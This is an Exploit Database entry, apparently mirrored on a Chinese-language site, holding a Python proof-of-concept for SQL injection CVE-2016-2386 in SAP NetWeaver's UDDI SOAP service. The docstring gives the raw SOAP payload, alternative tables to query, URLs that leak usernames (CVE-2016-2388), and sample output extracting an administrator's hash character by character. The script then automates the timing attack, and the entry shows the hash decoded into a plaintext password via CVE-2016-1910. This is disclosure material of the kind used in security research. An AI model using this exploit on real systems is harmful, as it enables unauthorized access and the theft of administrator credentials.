SAP NetWeaver J2EE Engine 7.40 – SQL Injection

• Exploit Database
• 17 阅读

• 作者： Vahagn Vardanyan
  日期： 2018-01-10
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/43495/

• #!/usr/bin/env python
  # coding=utf-8
  """
  Author: Vahagn Vardanyan https://twitter.com/vah_13
  
  Bugs:
  CVE-2016-2386 SQL injection
  CVE-2016-2388 Information disclosure
  CVE-2016-1910 Crypto issue
  
  
  
  Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50
  
  POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
  	User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  	SOAPAction:
  	Content-Type: text/xml;charset=UTF-8
  	Host: nw74:50000
  	Content-Length: 500
  
  	<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
  	<soapenv:Header/>
  	<soapenv:Body>
  		<sec:deletePermissionById>
  		<permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
  		</sec:deletePermissionById>
  	</soapenv:Body>
  	</soapenv:Envelope>
  
  
  
  
  In SAP test server I have admin user who login is "Administrator" and so I used this payload
  
  %PRIVATE_DATASOURCE.un:Administrator%
  
  most SAP's using j2ee_admin username for SAP administrator login
  
  %PRIVATE_DATASOURCE.un:j2ee_admin%
  
  You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure)
  
  	1)	http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat#
  	2)	http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages#
  
  Instead of J2EE_CONFIGENTRY table you can use this tables
  
  UME_STRINGS_PERM
  UME_STRINGS_ACTN
  BC_DDDBDP
  BC_COMPVERS
  TC_WDRR_MRO_LUT
  TC_WDRR_MRO_FILES
  T_CHUNK!!! very big table, if SAP server will not response during 20 seconds then you have SQL injection
  T_DOMAIN
  T_SESSION
  UME_ACL_SUP_PERM
  UME_ACL_PERM
  UME_ACL_PERM_MEM
  
  
  An example of a working exploit
  
  	C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000
  	start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit
  	this may take a few minutes
  	Found {SHA-512, 10000, 24}M
  	Found {SHA-512, 10000, 24}MT
  	Found {SHA-512, 10000, 24}MTI
  	Found {SHA-512, 10000, 24}MTIz
  	Found {SHA-512, 10000, 24}MTIzU
  	Found {SHA-512, 10000, 24}MTIzUV
  	Found {SHA-512, 10000, 24}MTIzUVd
  	Found {SHA-512, 10000, 24}MTIzUVdF
  	Found {SHA-512, 10000, 24}MTIzUVdFY
  	Found {SHA-512, 10000, 24}MTIzUVdFYX
  	Found {SHA-512, 10000, 24}MTIzUVdFYXN
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk8
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6
  	Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X
  
  
  And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text
  
  	base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX
  
  """
  import argparse
  import requests
  import string
  
  _magic = "{SHA-512, 10000, 24}"
  _wrong_magic = "{SHA-511, 10000, 24}"
  _xml = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " \
   "xmlns:sec=\"http://sap.com/esi/uddi/ejb/security/\">\r\n<soapenv:Header/>\r\n<soapenv:Body>\r\n" \
   "<sec:deletePermissionById>\r\n<permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, " \
   "UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{" \
   "0}%') AND '1'='1</permissionId>\r\n</sec:deletePermissionById>\r\n</soapenv:Body>\r\n</soapenv:Envelope> "
  host = ""
  port = 0
  _dictionary = string.digits + string.uppercase + string.lowercase
  
  def _get_timeout(_data):
  return requests.post("http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean".format(host, port),
   headers={
   "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 "
   "Firefox/57.0",
   "SOAPAction": "",
   "Content-Type": "text/xml;charset=UTF-8"
   },
   data=_xml.format(_data)).elapsed.total_seconds()
  
  
  if __name__ == "__main__":
  parser = argparse.ArgumentParser()
  parser.add_argument('--host')
  parser.add_argument('--port')
  parser.add_argument('-v')
  
  args = parser.parse_args()
  args_dict = vars(args)
  
  host = args_dict['host']
  port = args_dict['port']
  
  print "start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit ".format(host)
  _hash = _magic
  print "this may take a few minutes"
  for i in range(24):# you can change it if like to get full hash
  for _char in _dictionary:
  if not (args_dict['v'] is None):
  print "checking {0}".format(_hash + _char)
  if _get_timeout(_hash + _char) > 1.300:# timeout for local SAP server
  _hash += _char
  print "Found " + _hash
  break